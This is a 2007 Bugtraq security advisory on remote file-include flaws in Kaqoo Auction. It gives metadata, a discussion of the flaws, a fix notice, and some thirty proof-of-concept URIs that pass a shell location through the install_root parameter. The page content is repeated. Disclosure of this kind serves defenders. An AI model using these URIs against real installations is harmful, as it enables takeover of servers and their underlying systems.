Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
BID:23211
Info
Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 23211 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 30 2007 12:00AM |
| Updated: | Apr 02 2007 10:22PM |
| Credit: | ThE dE@Th is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Kaqoo Auction 0 |
| Not Vulnerable: |
Kaqoo Auction 2007033119 |
Discussion
Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
Kaqoo Auction is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Kaqoo Auction is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Exploit / POC
Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/include/core/support.inc.php?install_root=[Shell]
http://www.example.com/include/core/function.inc.php?install_root=[Shell]
http://www.example.com/include/core/rdal_object.inc.php?install_root=[Shell]
http://www.example.com/include/core/rdal_editor.inc.php?install_root=[Shell]
http://www.example.com/include/core/login.inc.php?install_root=[Shell]
http://www.example.com/include/core/request.inc.php?install_root=[Shell]
http://www.example.com/include/core/categories.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/save.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/preview.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/edit_item.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/new_item.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/item_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/search.inc.php?install_root=[Shell]
http://www.example.com/include/display/item_edit.inc.php?install_root=[Shell]
http://www.example.com/include/display/register_succsess.inc.php?install_root=[Shell]
http://www.example.com/include/display/context_menu.inc.php?install_root=[Shell]
http://www.example.com/include/display/item_repost.inc.php?install_root=[Shell]
http://www.example.com/include/display/balance.inc.php?install_root=[Shell]
http://www.example.com/include/display/featured.inc.php?install_root=[Shell]
http://www.example.com/include/display/user.inc.php?install_root=[Shell]
http://www.example.com/include/display/buynow.inc.php?install_root=[Shell]
http://www.example.com/include/display/install_complete.inc.php?install_root=[Shell]
http://www.example.com/include/display/fees_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/user_feedback.inc.php?install_root=[Shell]
http://www.example.com/include/display/admin_balance.inc.php?install_root=[Shell]
http://www.example.com/include/display/activate.inc.php?install_root=[Shell]
http://www.example.com/include/display/user_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/member.inc.php?install_root=[Shell]
http://www.example.com/include/display/add_bid.inc.php?install_root=[Shell]
http://www.example.com/include/display/items_filter.inc.php?install_root=[Shell]
http://www.example.com/include/display/my_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/register.inc.php?install_root=[Shell]
http://www.example.com/include/display/leave_feedback.inc.php?install_root=[Shell]
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/include/core/support.inc.php?install_root=[Shell]
http://www.example.com/include/core/function.inc.php?install_root=[Shell]
http://www.example.com/include/core/rdal_object.inc.php?install_root=[Shell]
http://www.example.com/include/core/rdal_editor.inc.php?install_root=[Shell]
http://www.example.com/include/core/login.inc.php?install_root=[Shell]
http://www.example.com/include/core/request.inc.php?install_root=[Shell]
http://www.example.com/include/core/categories.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/save.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/preview.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/edit_item.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/new_item.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/item_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/search.inc.php?install_root=[Shell]
http://www.example.com/include/display/item_edit.inc.php?install_root=[Shell]
http://www.example.com/include/display/register_succsess.inc.php?install_root=[Shell]
http://www.example.com/include/display/context_menu.inc.php?install_root=[Shell]
http://www.example.com/include/display/item_repost.inc.php?install_root=[Shell]
http://www.example.com/include/display/balance.inc.php?install_root=[Shell]
http://www.example.com/include/display/featured.inc.php?install_root=[Shell]
http://www.example.com/include/display/user.inc.php?install_root=[Shell]
http://www.example.com/include/display/buynow.inc.php?install_root=[Shell]
http://www.example.com/include/display/install_complete.inc.php?install_root=[Shell]
http://www.example.com/include/display/fees_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/user_feedback.inc.php?install_root=[Shell]
http://www.example.com/include/display/admin_balance.inc.php?install_root=[Shell]
http://www.example.com/include/display/activate.inc.php?install_root=[Shell]
http://www.example.com/include/display/user_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/member.inc.php?install_root=[Shell]
http://www.example.com/include/display/add_bid.inc.php?install_root=[Shell]
http://www.example.com/include/display/items_filter.inc.php?install_root=[Shell]
http://www.example.com/include/display/my_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/register.inc.php?install_root=[Shell]
http://www.example.com/include/display/leave_feedback.inc.php?install_root=[Shell]
Solution / Fix
Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
Solution:
The vendor has released version 2007033119 to address this issue. Contact the vendor for details on obtaining the appropriate updates.
Solution:
The vendor has released version 2007033119 to address this issue. Contact the vendor for details on obtaining the appropriate updates.
References
Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
References:
References:
- Kaqoo Auction Homepage (Kaqoo)